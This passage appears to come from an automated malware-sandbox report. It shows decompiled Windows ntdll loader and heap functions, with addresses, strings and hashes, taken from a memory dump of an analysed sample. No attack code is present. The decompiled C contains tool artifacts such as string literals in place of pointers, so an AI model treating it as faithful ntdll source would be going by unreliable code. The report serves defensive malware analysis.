						L341B88C0(( *_t183 & 0x0000ffff) + _t183[2], _t135[2],  *_t135 & 0x0000ffff);
						_t189 = _t189 + 0xc;
						 *_t183 =  *_t183 + ( *_t135 & 0x0000ffff);
						 *((short*)(_t183[2] + (( *_t183 & 0x0000ffff) >> 1) * 2)) = 0;
						goto L25;
					} else {
						goto L18;
					}
					while(1) {
						L18:
						_t151 =  *_t96 & 0x0000ffff;
						if(_t151 == 0x5c || _t151 == 0x2f) {
							break;
						}
						_t96 = _t96 - 2;
						if(_t96 >= _t168) {
							continue;
						}
						_t138 = _a8;
						goto L22;
					}
					__eflags = L341A432E(_t135) - 5;
					if(__eflags == 0) {
						_t184 = E3418C7E7(_t183, _t135);
						goto L25;
					}
					_t112 = E341923C4(_t135, _t183, __eflags);
					_t138 = _a8;
					_t184 = _t112;
					_t81 = _t135;
					__eflags = _t184;
					if(_t184 < 0) {
						goto L83;
					}
					 *_t138 =  *_t138 | 0x00000600;
					goto L27;
				} else {
					_v5 = 0;
					_v20 =  *[fs:0x30];
					_v7 = 1;
					E3418DF36(0, _t135, 0x14d0);
					asm("sbb edx, edx");
					if(E3419015C( *((intOrPtr*)( *[fs:0x30] + 0x38)), _t135,  ~_a4 & _a4 + 0x0000002c,  &_v6,  &_v28) < 0 || _v6 == 0) {
						_t119 = 0x14d3;
					} else {
						__eflags = _v28;
						if(_v28 == 0) {
							_t119 = 0x14d2;
						} else {
							_t119 = 0x14d1;
						}
					}
					E3418DF36(0, _t135, _t119);
					if(_v6 != 0) {
						__eflags = _v28;
						if(_v28 == 0) {
							_t184 = 0xc0000481;
							goto L14;
						}
						 *_t183 = 0;
						E341B5050(0,  &_v44, E341801C0());
						E3418C7E7(_t183,  &_v44);
						E3418C7E7(_t183, 0x34141008);
						_t184 = E3418C7E7(_t183,  &_v28);
						__eflags = _t184;
						if(_t184 < 0) {
							goto L7;
						}
						_t134 =  *(_v20 + 0x10);
						__eflags = _t134;
						if(_t134 == 0) {
							L53:
							_t128 = 0;
							__eflags = 0;
							L54:
							_t161 = _t183;
							goto L8;
						}
						__eflags =  *(_t134 + 8) & 0x00001000;
						if(( *(_t134 + 8) & 0x00001000) != 0) {
							_t128 = 1;
							goto L54;
						}
						goto L53;
					} else {
						L7:
						_t128 = _v7;
						_t161 = _t135;
						L8:
						if(_t184 < 0) {
							L83:
							__eflags =  *0x342637c0 & 0x00000003;
							if(( *0x342637c0 & 0x00000003) != 0) {
								_push(_t184);
								E341EE692("minkernel\\ntdll\\ldrutil.c", 0xab2, "LdrpPreprocessDllName", 0, "LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx\n", _t135);
							}
							__eflags =  *0x342637c0 & 0x00000010;
							if(( *0x342637c0 & 0x00000010) != 0) {
								asm("int3");
							}
							L40:
							if(_v8 != 0) {
								E3418C4A0(_v16,  &_v16);
							}
							return _t184;
						} else {
							if(_t128 != 0 &&  *0x34265d70 == 0) {
								_t136 = E34189870("true", _t161, 0x3414116c, 0,  &_v36, 0, 0, 0, 0);
								if(_t136 >= 0) {
									_v5 = 1;
									E341923C4( &_v36, _t183, __eflags);
									E3419E3C9( &_v36);
								}
								if(_t136 != 0xc0150008) {
									_t184 = _t136;
								}
								_t135 = _v12;
							}
							L14:
							if(_t184 < 0) {
								goto L83;
							} else {
								_t138 = _a8;
								_t75 = _v5;
								goto L16;
							}
						}
					}
				}
			}

0x3418b0de
0x3418b0e3
0x3418b0e5
0x3418b0ef
0x341d81db
0x3418b0f5
0x3418b0f5
0x3418b0f5
0x3418b0f9
0x3418b0fc
0x3418b0fe
0x3418b100
0x3418b109
0x3418b1d5
0x3418b1d9
0x3418b1dc
0x3418b303
0x3418b30a
0x341d81f8
0x341d81fa
0x341d81ff
0x341d8201
0x341d8201
0x341d8206
0x341d8207
0x341d821f
0x341d8224
0x341d8227
0x341d8227
0x3418b312
0x3418b317
0x3418b31b
0x3418b31d
0x3418b3ff
0x3418b3ff
0x3418b323
0x3418b325
0x3418b264
0x3418b266
0x00000000
0x00000000
0x3418b272
0x3418b2f6
0x3418b2fb
0x3418b2fb
0x3418b278
0x3418b281
0x3418b285
0x3418b2a0
0x3418b2ac
0x00000000
0x3418b287
0x3418b287
0x3418b287
0x3418b28d
0x00000000
0x00000000
0x3418b292
0x3418b299
0x3418b29e
0x00000000
0x00000000
0x3418b29e
0x00000000
0x3418b292
0x3418b2b3
0x3418b2b9
0x3418b2bb
0x3418b2bd
0x3418b2ca
0x3418b2ca
0x3418b2cc
0x3418b2d0
0x3418b2d2
0x00000000
0x00000000
0x00000000
0x3418b2d2
0x3418b2c0
0x3418b2c0
0x3418b2c4
0x00000000
0x00000000
0x341d82bf
0x341d82c2
0x341d82c5
0x341d82c7
0x00000000
0x00000000
0x00000000
0x341d82cd
0x00000000
0x3418b2c0
0x3418b285
0x3418b1e5
0x3418b1eb
0x3418b1ef
0x3418b210
0x3418b210
0x3418b213
0x3418b215
0x3418b21b
0x3418b262
0x3418b262
0x00000000
0x3418b262
0x3418b225
0x3418b22d
0x341d823f
0x341d8245
0x341d8251
0x341d8254
0x341d8257
0x341d825d
0x341d825f
0x341d825f
0x341d8264
0x341d8267
0x341d826a
0x341d826c
0x341d827f
0x341d8281
0x341d8284
0x341d8286
0x00000000
0x00000000
0x341d8288
0x341d828b
0x341d828e
0x341d8295
0x341d829a
0x341d829d
0x341d829d
0x00000000
0x341d826e
0x341d8275
0x341d82a0
0x341d82a0
0x341d82a2
0x341d82b0
0x341d82b0
0x3418b25f
0x3418b25f
0x00000000
0x3418b25f
0x341d82a4
0x341d82a7
0x00000000
0x341d82a7
0x341d826c
0x341d8247
0x00000000
0x341d8247
0x3418b233
0x3418b236
0x3418b243
0x3418b24b
0x3418b24e
0x3418b25b
0x00000000
0x00000000
0x00000000
0x00000000
0x3418b1f1
0x3418b1f1
0x3418b1f1
0x3418b1f7
0x00000000
0x00000000
0x3418b206
0x3418b20b
0x00000000
0x00000000
0x3418b20d
0x00000000
0x3418b20d
0x3418b3ae
0x3418b3b1
0x341d8238
0x00000000
0x341d8238
0x3418b3bb
0x3418b3c0
0x3418b3c3
0x3418b3c5
0x3418b3c7
0x3418b3c9
0x00000000
0x00000000
0x3418b3cf
0x00000000
0x3418b10f
0x3418b117
0x3418b123
0x3418b129
0x3418b12d
0x3418b144
0x3418b154
0x3418b160
0x3418b32d
0x3418b32d
0x3418b332
0x341d81e4
0x3418b338
0x3418b338
0x3418b338
0x3418b332
0x3418b16a
0x3418b173
0x3418b342
0x3418b347
0x341d81ee
0x00000000
0x341d81ee
0x3418b34f
0x3418b35c
0x3418b366
0x3418b372
0x3418b381
0x3418b383
0x3418b385
0x00000000
0x00000000
0x3418b38e
0x3418b391
0x3418b393
0x3418b39e
0x3418b39e
0x3418b39e
0x3418b3a0
0x3418b3a0
0x00000000
0x3418b3a0
0x3418b395
0x3418b39c
0x3418b406
0x00000000
0x3418b406
0x00000000
0x3418b179
0x3418b179
0x3418b179
0x3418b17c
0x3418b17e
0x3418b180
0x341d82d2
0x341d82d2
0x341d82d9
0x341d82db
0x341d82f3
0x341d82f8
0x341d82fb
0x341d8302
0x341d8308
0x341d8308
0x3418b2d8
0x3418b2dc
0x3418b2e5
0x3418b2e5
0x3418b2f2
0x3418b186
0x3418b188
0x3418b1ae
0x3418b1b2
0x3418b3dc
0x3418b3e3
0x3418b3eb
0x3418b3eb
0x3418b1be
0x3418b3f5
0x3418b3f5
0x3418b1c4
0x3418b1c4
0x3418b1c7
0x3418b1c9
0x00000000
0x3418b1cf
0x3418b1cf
0x3418b1d2
0x00000000
0x3418b1d2
0x3418b1c9
0x3418b180
0x3418b173

Strings

LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 341D82DD
LdrpPreprocessDllName, xrefs: 341D8210, 341D82E4
DLL %wZ was redirected to %wZ by %s, xrefs: 341D8209
SxS, xrefs: 341D81FA
API set, xrefs: 341D8201, 341D8206
minkernel\ntdll\ldrutil.c, xrefs: 341D821A, 341D82EE

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: d41d2f917ade9c75fa1e942162855c8656d7e763e03e4e9e4216e08653d6458b
Instruction ID: bc12c2c0105ecba7ef42899f45a97d24995935987e8c50fff3ab4e6226a2431e
Opcode Fuzzy Hash: d41d2f917ade9c75fa1e942162855c8656d7e763e03e4e9e4216e08653d6458b
Instruction Fuzzy Hash: 61C139B5A00F15DFEB148F64C8D0BBF77A6AF46714F5441A9F821AB2A0EB74D844CB90

Uniqueness

Uniqueness Score: -1.00%

Function 341A2594 Relevance: 7.6, Strings: 6, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E341A2594(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr* _t34;
				signed int _t35;
				void* _t38;
				signed int _t41;
				void* _t43;

				_t38 = __edx;
				_t35 = __ecx;
				_t21 =  *[fs:0x30];
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				if(__edx == 0x3414120c) {
					E341FEF10(0x33, 0, "SXS: %s() passed the empty activation context\n", "RtlGetAssemblyStorageRoot");
					goto L23;
				} else {
					_t34 = _a8;
					if(_t34 != 0) {
						 *_t34 = 0;
					}
					_t41 = _a4;
					if((_t35 & 0xfffffffc) != 0 || _t41 < 1 || _t34 == 0) {
						_push(E341A2C10);
						_push(_t34);
						_push(_t41);
						_push(_t35);
						E341FEF10(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Flags              : 0x%lx\nSXS:    AssemblyRosterIndex: 0x%lx\nSXS:    AssemblyStorageRoot: %p\nSXS:    Callback           : %p\n", "RtlGetAssemblyStorageRoot");
						goto L23;
					} else {
						_t43 = E341A265C(_t35 & 0x00000003, _t21, _t38,  &_v12,  &_v8,  &_v16);
						if(_t43 < 0) {
							_push(_t43);
							_push("SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header.  Status = 0x%08lx\n");
							goto L20;
						} else {
							_t40 = _v12;
							if(_v12 == 0) {
								L14:
								_t43 = 0;
							} else {
								_t27 = _v16;
								if(_t27 == 0) {
									L16:
									_t43 = 0xc00000e5;
								} else {
									_t37 = _v8;
									if(_v8 == 0) {
										goto L16;
									} else {
										if(_t41 >=  *((intOrPtr*)(_t27 + 8))) {
											_push( *((intOrPtr*)(_t27 + 8)));
											_push(_t41);
											E341FEF10(0x33, 0, "SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx\n", "RtlGetAssemblyStorageRoot");
											L23:
											_t43 = 0xc000000d;
										} else {
											_t43 = L341A2919(_t37, _t40, _t41, _t37, _a16);
											if(_t43 < 0) {
												_push(_t43);
												_push("SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry.  Status = 0x%08lx\n");
												L20:
												_push(0);
												_push(0x33);
												E341FEF10();
											} else {
												_t32 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + _t41 * 4));
												if(_t32 == 0) {
													goto L16;
												} else {
													 *_t34 = _t32 + 4;
													goto L14;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _t43;
			}

0x341a2594
0x341a2594
0x341a259c
0x341a25a6
0x341a25a9
0x341a25ac
0x341a25b6
0x341e1f77
0x00000000
0x341a25bc
0x341a25bc
0x341a25c1
0x341a25c3
0x341a25c3
0x341a25c5
0x341a25ce
0x341e1fbc
0x341e1fc1
0x341e1fc2
0x341e1fc3
0x341e1fd1
0x00000000
0x341a25e5
0x341a25fc
0x341a2600
0x341e1f81
0x341e1f82
0x00000000
0x341a2606
0x341a2606
0x341a260b
0x341a264a
0x341a264a
0x341a260d
0x341a260d
0x341a2612
0x341a2655
0x341a2655
0x341a2614
0x341a2614
0x341a2619
0x00000000
0x341a261b
0x341a261e
0x341e1fa0
0x341e1fa3
0x341e1fb2
0x341e1fd9
0x341e1fd9
0x341a2624
0x341a262e
0x341a2632
0x341e1f89
0x341e1f8a
0x341e1f8f
0x341e1f8f
0x341e1f91
0x341e1f93
0x341a2638
0x341a263e
0x341a2643
0x00000000
0x341a2645
0x341a2648
0x00000000
0x341a2648
0x341a2643
0x341a2632
0x341a261e
0x341a2619
0x341a2612
0x341a260b
0x341a2600
0x341a25ce
0x341a2652

Strings

SXS: %s() passed the empty activation context, xrefs: 341E1F6F
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 341E1F8A
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 341E1FA9
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 341E1FC9
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 341E1F82
RtlGetAssemblyStorageRoot, xrefs: 341E1F6A, 341E1FA4, 341E1FC4

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 665d014a338205c1bbe0c557c666c1a8d10b0adc9c76cdceb678d3449214acf6
Instruction ID: 7fff467358f5bb06e3719ae73e0dc370e277a6620cf1598cea797203f1d8ae1d
Opcode Fuzzy Hash: 665d014a338205c1bbe0c557c666c1a8d10b0adc9c76cdceb678d3449214acf6
Instruction Fuzzy Hash: 7C31057EA01E24BBF7108A958CC1FABF669AB41690F0501D9BD15B7350D730EE51CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 341AC5C6 Relevance: 7.6, Strings: 6, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E341AC5C6() {
				signed int _v8;
				signed int _v24;
				char _v92;
				char _v96;
				char _v97;
				intOrPtr _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				signed char _t52;
				void* _t58;
				intOrPtr _t65;
				intOrPtr* _t72;
				void* _t73;
				signed int _t75;
				void* _t76;
				signed int _t77;
				signed int _t79;

				_t79 = (_t77 & 0xfffffff8) - 0x64;
				_v8 =  *0x3426b370 ^ _t79;
				_t72 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x2a4;
				_t75 = 0;
				if( *_t72 != 0) {
					__eflags =  *0x342637c0 & 0x00000005;
					if(( *0x342637c0 & 0x00000005) != 0) {
						E341EE692("minkernel\\ntdll\\ldrredirect.c", 0x23c, "LdrpInitializeImportRedirection", 2, "Loading import redirection DLL: \'%wZ\'\n", _t72);
						_t79 = _t79 + 0x18;
					}
					E341B8F40( &_v92, 0, 0x50);
					_t79 = _t79 + 0xc;
					_t68 =  &_v92;
					_t59 = _t72;
					_t75 = L34166B45(_t72,  &_v92, 0x1000001,  &_v96);
					__eflags = _v24;
					if(_v24 != 0) {
						E3419E7E0(_t59, _v92);
					}
					__eflags = _t75;
					if(__eflags >= 0) {
						_t75 = E341F4348(_v96, __eflags);
						__eflags = _t75;
						if(_t75 >= 0) {
							L341919DF(0);
							E34192755(_t68);
							_v97 = 0;
							_t65 =  *((intOrPtr*)(_v96 + 0x50));
							_t42 = L34191934(_t65, 0,  &_v97);
							_push(_t65);
							_t75 = _t42;
							_push(_t75);
							_t68 = 2;
							E3419270D(_t68);
							L341A79F9();
							__eflags = _t75;
							if(_t75 >= 0) {
								 *( *((intOrPtr*)(_v100 + 0x50)) + 0xc) =  *( *((intOrPtr*)(_v100 + 0x50)) + 0xc) | 0xffffffff;
								 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x50)))) - 0x1c)) = 0xffff;
								E341F05C6(_v100, _t68);
								 *0x34265c9c = _v100;
							}
						} else {
							_t52 =  *0x342637c0; // 0x0
							__eflags = _t52 & 0x00000003;
							if((_t52 & 0x00000003) != 0) {
								E341EE692("minkernel\\ntdll\\ldrredirect.c", 0x257, "LdrpInitializeImportRedirection", 0, "Unable to build import redirection Table, Status = 0x%x\n", _t75);
								_t52 =  *0x342637c0; // 0x0
								_t79 = _t79 + 0x18;
							}
							__eflags = _t52 & 0x00000010;
							if((_t52 & 0x00000010) != 0) {
								asm("int3");
							}
						}
					}
				}
				_pop(_t73);
				_pop(_t76);
				_pop(_t58);
				return L341B4B50(_t75, _t58, _v8 ^ _t79, _t68, _t73, _t76);
			}

0x341ac5ce
0x341ac5d8
0x341ac5ea
0x341ac5f0
0x341ac5f5
0x341e7f71
0x341e7f78
0x341e7f91
0x341e7f96
0x341e7f96
0x341e7fa1
0x341e7fa6
0x341e7fad
0x341e7fb1
0x341e7fbe
0x341e7fc0
0x341e7fc4
0x341e7fca
0x341e7fca
0x341e7fcf
0x341e7fd1
0x341e7fe0
0x341e7fe2
0x341e7fe4
0x341e8022
0x341e8027
0x341e8037
0x341e803b
0x341e803e
0x341e8043
0x341e8044
0x341e8046
0x341e8049
0x341e804a
0x341e804f
0x341e8054
0x341e8056
0x341e8068
0x341e8075
0x341e807d
0x341e8086
0x341e8086
0x341e7fe6
0x341e7fe6
0x341e7feb
0x341e7fed
0x341e8005
0x341e800a
0x341e800f
0x341e800f
0x341e8012
0x341e8014
0x341e801a
0x341e801a
0x341e8014
0x341e7fe4
0x341e7fd1
0x341ac601
0x341ac602
0x341ac603
0x341ac60e

Strings

minkernel\ntdll\ldrinit.c, xrefs: 341AC5E3
Unable to build import redirection Table, Status = 0x%x, xrefs: 341E7FF0
LdrpInitializeProcess, xrefs: 341AC5E4
LdrpInitializeImportRedirection, xrefs: 341E7F82, 341E7FF6
Loading import redirection DLL: '%wZ', xrefs: 341E7F7B
minkernel\ntdll\ldrredirect.c, xrefs: 341E7F8C, 341E8000

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: bd643c4a83852d13331071ebf30a52ef492095412614732fbda7e79a556fdb95
Instruction ID: 40362955292c082012a2300091edf39e9efe498041707993e6596bc6b9c341a5
Opcode Fuzzy Hash: bd643c4a83852d13331071ebf30a52ef492095412614732fbda7e79a556fdb95
Instruction Fuzzy Hash: 5331E2B9604F02DFE214DB28D8C5E6ABBD5EF84610F004598F895AB291E760DC458BE2

Uniqueness

Uniqueness Score: -1.00%

Function 34180680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E34180680(intOrPtr __ecx, signed int* __edx) {
				signed int* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr* _v24;
				signed int _v28;
				signed int _v32;
				signed char _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t136;
				signed int _t141;
				void* _t143;
				signed int* _t145;
				signed int* _t146;
				intOrPtr _t148;
				unsigned int _t150;
				char _t162;
				signed int* _t164;
				signed char* _t165;
				intOrPtr _t166;
				signed int* _t168;
				signed char* _t169;
				signed char* _t171;
				signed char* _t180;
				intOrPtr _t195;
				signed int _t197;
				signed int _t209;
				signed char _t210;
				intOrPtr* _t215;
				intOrPtr _t222;
				signed int _t232;
				intOrPtr* _t242;
				intOrPtr _t244;
				unsigned int _t245;
				intOrPtr _t247;
				intOrPtr* _t258;
				signed char _t264;
				unsigned int _t269;
				intOrPtr _t271;
				signed int* _t276;
				signed int _t277;
				void* _t278;
				intOrPtr _t281;
				signed int* _t287;
				intOrPtr _t288;
				unsigned int _t291;
				unsigned int* _t295;
				intOrPtr* _t298;
				intOrPtr _t300;

				_t231 = __edx;
				_v8 = __edx;
				_t300 = __ecx;
				_t298 = L34180ACE(__edx,  *__edx);
				if(_t298 == __ecx + 0x8c) {
					L45:
					return 0;
				}
				if( *0x34266960 >= 1) {
					__eflags =  *(_t298 + 0x14) -  *__edx;
					if(__eflags < 0) {
						_t222 =  *[fs:0x30];
						__eflags =  *(_t222 + 0xc);
						if( *(_t222 + 0xc) == 0) {
							_push("HEAP: ");
							L3416B910();
						} else {
							L3416B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						L3416B910();
						__eflags =  *0x34265da8;
						if(__eflags == 0) {
							E3422FC95(_t231, 1, _t298, __eflags);
						}
					}
				}
				_t136 =  *((intOrPtr*)(_t298 - 2));
				_t4 = _t298 - 8; // -8
				_t232 = _t4;
				if(_t136 != 0) {
					_v12 = (_t232 & 0xffff0000) - ((_t136 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_v12 = _t300;
				}
				_v20 =  *((intOrPtr*)(_t298 + 0x10));
				_t141 =  *(_t300 + 0xcc) ^  *0x34266d48;
				_v28 = _t141;
				if(_t141 != 0) {
					 *0x342691e0(_t300,  &_v20, _v8);
					_t143 = _v28();
					_t276 = _v8;
					goto L13;
				} else {
					_t295 = _v8;
					if( *(_t298 + 0x14) -  *_t295 <=  *(_t300 + 0x6c) << 3) {
						_t269 =  *(_t298 + 0x14);
						__eflags = _t269 -  *(_t300 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t295 = _t269;
						}
					}
					if(( *(_t300 + 0x40) & 0x00040000) != 0) {
						_push(0);
						_push("true");
						_v16 = 0x40;
						_push( &_v60);
						_push(3);
						_push(_t300);
						_push(0xffffffff);
						_t209 = L341B2BE0();
						__eflags = _t209;
						_t210 = _v56;
						if(_t209 < 0) {
							L61:
							__eflags = 0;
							E34235FED(0, _t300, "true", _t210, 0, 0);
							_v16 = 4;
							L62:
							_t276 = _v8;
							goto L8;
						}
						__eflags = _t210 & 0x00000060;
						if((_t210 & 0x00000060) == 0) {
							goto L61;
						}
						__eflags = _v60 - _t300;
						if(__eflags == 0) {
							goto L62;
						}
						goto L61;
					} else {
						_v16 = 4;
						L8:
						_v32 =  *_t276;
						_v28 =  *((intOrPtr*)(_t300 + 0x1f8)) -  *((intOrPtr*)(_t300 + 0x244));
						_t215 = _t300 + 0xd4;
						_v24 = _t215;
						if( *0x3426373c != 0) {
							L11:
							_push(_v16);
							_push(0x1000);
							_push(_t276);
							_push(0);
							_push( &_v20);
							_push(0xffffffff);
							_t143 = E341B2B10();
							_t276 = _v8;
							L12:
							 *((intOrPtr*)(_t300 + 0x21c)) =  *((intOrPtr*)(_t300 + 0x21c)) + 1;
							L13:
							if(_t143 < 0) {
								 *((intOrPtr*)(_t300 + 0x224)) =  *((intOrPtr*)(_t300 + 0x224)) + 1;
								goto L45;
							}
							_t145 =  *( *[fs:0x30] + 0x50);
							if(_t145 != 0) {
								__eflags =  *_t145;
								if(__eflags == 0) {
									goto L15;
								}
								_t146 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
								L16:
								if( *_t146 != 0) {
									__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
									if(__eflags != 0) {
										E3422EFD3(_t232, _t300, _v20,  *_t276, 2);
									}
								}
								if( *((intOrPtr*)(_t300 + 0x4c)) != 0) {
									_t291 =  *(_t300 + 0x50) ^  *_t232;
									 *_t232 = _t291;
									_t264 = _t291 >> 0x00000010 ^ _t291 >> 0x00000008 ^ _t291;
									if(_t291 >> 0x18 != _t264) {
										_push(_t264);
										E3422D646(_t232, _t300, _t232, _t298, _t300, __eflags);
									}
								}
								 *((char*)(_t232 + 2)) = 0;
								 *((char*)(_t232 + 7)) = 0;
								_t148 =  *((intOrPtr*)(_t298 + 8));
								_t242 =  *((intOrPtr*)(_t298 + 0xc));
								_t277 =  *((intOrPtr*)(_t148 + 4));
								_v32 = _t277;
								_t38 = _t298 + 8; // 0x8
								_t278 = _t38;
								if( *_t242 != _t277 ||  *_t242 != _t278) {
									E34235FED(0xd, 0, _t278, _v32,  *_t242, 0);
								} else {
									 *_t242 = _t148;
									 *((intOrPtr*)(_t148 + 4)) = _t242;
								}
								_t150 =  *(_t298 + 0x14);
								if(_t150 == 0) {
									L27:
									_t244 = _v12;
									 *((intOrPtr*)(_t244 + 0x30)) =  *((intOrPtr*)(_t244 + 0x30)) - 1;
									 *((intOrPtr*)(_t244 + 0x2c)) =  *((intOrPtr*)(_t244 + 0x2c)) - ( *(_t298 + 0x14) >> 0xc);
									 *((intOrPtr*)(_t300 + 0x1f8)) =  *((intOrPtr*)(_t300 + 0x1f8)) +  *(_t298 + 0x14);
									 *((intOrPtr*)(_t300 + 0x20c)) =  *((intOrPtr*)(_t300 + 0x20c)) + 1;
									 *((intOrPtr*)(_t300 + 0x208)) =  *((intOrPtr*)(_t300 + 0x208)) - 1;
									_t245 =  *(_t298 + 0x14);
									if(_t245 >= 0x7f000) {
										 *((intOrPtr*)(_t300 + 0x1fc)) =  *((intOrPtr*)(_t300 + 0x1fc)) - _t245;
										_t245 =  *(_t298 + 0x14);
									}
									_t280 = _v8;
									_t154 =  *_v8;
									if(_t245 <=  *_v8) {
										_t281 = _v12;
										__eflags =  *((intOrPtr*)(_t298 + 0x10)) + _t245 -  *((intOrPtr*)(_t281 + 0x28));
										_t280 = _v8;
										if( *((intOrPtr*)(_t298 + 0x10)) + _t245 !=  *((intOrPtr*)(_t281 + 0x28))) {
											 *_t280 =  *_t280 + ( *_t232 & 0x0000ffff) * 8;
											goto L30;
										}
										_t154 =  *_t280;
										goto L29;
									} else {
										L29:
										L3418096B(_t300, _v12,  *((intOrPtr*)(_t298 + 0x10)) + 0xffffffe8 +  *_t280, _t245 - _t154, _t232, _t280);
										 *_v8 =  *_v8 << 3;
										L30:
										_t247 = _v12;
										 *((char*)(_t232 + 3)) = 0;
										_t282 =  *((intOrPtr*)(_t247 + 0x18));
										if( *((intOrPtr*)(_t247 + 0x18)) != _t247) {
											_t162 = (_t232 - _t247 >> 0x10) + 1;
											_v32 = _t162;
											__eflags = _t162 - 0xfe;
											if(_t162 >= 0xfe) {
												E34235FED(3, _t282, _t232, _t247, 0, 0);
												_t162 = _v32;
											}
										} else {
											_t162 = 0;
										}
										 *((char*)(_t232 + 6)) = _t162;
										_t164 =  *( *[fs:0x30] + 0x50);
										if(_t164 != 0) {
											__eflags =  *_t164;
											if( *_t164 == 0) {
												goto L33;
											}
											_t165 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
											L34:
											if( *_t165 != 0) {
												_t166 =  *[fs:0x30];
												__eflags =  *(_t166 + 0x240) & 0x00000001;
												if(( *(_t166 + 0x240) & 0x00000001) == 0) {
													goto L35;
												}
												__eflags = E34183C40();
												if(__eflags == 0) {
													_t180 = 0x7ffe0380;
												} else {
													_t180 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t299 = _v8;
												E3422F1C3(_t232, _t300, _t232, __eflags,  *_v8,  *(_t300 + 0x74) << 3,  *_t180 & 0x000000ff);
												L36:
												_t168 =  *( *[fs:0x30] + 0x50);
												if(_t168 != 0) {
													__eflags =  *_t168;
													if( *_t168 == 0) {
														goto L37;
													}
													_t169 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													L38:
													if( *_t169 != 0) {
														__eflags = E34183C40();
														if(__eflags == 0) {
															_t171 = 0x7ffe038a;
														} else {
															_t171 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
														}
														E3422F1C3(_t232, _t300, _t232, __eflags,  *_t299,  *(_t300 + 0x74) << 3,  *_t171 & 0x000000ff);
													}
													return _t232;
												}
												L37:
												_t169 = 0x7ffe038a;
												goto L38;
											}
											L35:
											_t299 = _v8;
											goto L36;
										}
										L33:
										_t165 = 0x7ffe0380;
										goto L34;
									}
								} else {
									_t287 =  *(_t300 + 0xb8);
									if(_t287 != 0) {
